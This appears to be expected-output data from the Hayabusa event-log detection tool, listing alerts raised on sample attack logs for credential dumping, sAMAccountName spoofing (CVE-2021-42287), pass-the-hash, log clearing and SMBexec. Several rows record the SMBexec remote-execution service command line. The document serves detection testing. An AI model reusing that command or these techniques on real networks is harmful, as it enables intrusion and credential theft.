+2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.084 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.105 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.123 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 21:01:18.896 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\drivers\etc\hosts | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 2592 | PGUID: A57649D1-E44F-61B5-D88F-850800000000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1565-Data manipulation/ID11-DNS hosts files modified.evtx
+2021-12-13 02:57:17.006 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.272 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: lgrove | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.277 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: lgrove@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.278 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: - | IP Addr: 172.16.66.19 | LID: 0x738ae4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.325 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738afd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.372 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738ce4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.375 +09:00,01566s-win16-ir.threebeesco.com,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,../hayabusa-rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_Kerberoasting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: 01566s-win16-ir | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.497 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738cf9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 02:57:52.518 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: 01566s-win16-ir@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
+2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS\ETC | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
+2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts:Zone.Identifier | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
+2021-12-13 17:21:30.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
+2021-12-13 17:21:30.829 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
+2021-12-13 17:21:30.845 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
+2021-12-13 21:55:45.250 +09:00,rootdc1.offsec.lan,7045,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx
+2021-12-13 21:55:45.250 +09:00,rootdc1.offsec.lan,4697,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x2cff42b44,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx
+2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: attacker | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: attacker | IP Addr: 10.23.123.11 | LID: 0x308fabb0c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer:  | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.693 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack1 | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.696 +09:00,rootdc1.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,../hayabusa-rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,../hayabusa-rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4781-Computer account renamed without a trailing $ (CVE-2021-42278).evtx
+2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx
+2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx
+2021-12-14 23:42:49.287 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.306 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.309 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.886 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmhorvath | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.889 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.927 +09:00,rootdc1.offsec.lan,4697,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | User: admmhorvath | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.937 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1624 | User: ROOTDC1$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.947 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1138 | User: ROOTDC1$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.986 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:49.989 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x308fd50bf,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
+2021-12-14 23:42:50.007 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
